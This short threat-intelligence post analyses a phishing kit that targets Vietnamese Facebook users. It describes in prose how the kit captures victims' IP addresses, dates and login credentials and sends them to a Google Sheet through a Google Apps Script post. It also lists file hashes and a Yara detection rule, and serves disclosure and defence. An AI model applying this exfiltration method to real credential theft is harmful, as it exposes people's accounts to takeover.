As we operate a StalkPhish instance which scan thousands suspicious links a day, we often find, let’s say originals, phishing kits to analyse. Today we found a phishing kit targeting vietnamese Facebook users:
There is no e-mail exfiltration vector as we can see commonly: this kit uses Google sheet form ajax post function to exfiltrate stolen credentials!
Reading the HTML file source code, we can see the page grab the victim’s IP address, Domain, date:
As well as the identifiers entered by users:
This function uses Google Apps Script function which permit to write into Google sheet using the API!
index.html (SHA256): 3cfd92bdd9a801382199a52624ecaa8b78a32dc80893f0a6186cce4128c6552b
phishing kit archive (SHA256): 34ee59548f8ba626568d91393acb76791a559f958c1f61bf5dabeb425e396640
Phishing Kit Yara Rule: https://github.com/t4d/PhishingKit-Yara-Rules/blob/master/PK_Facebook_GSheet.yar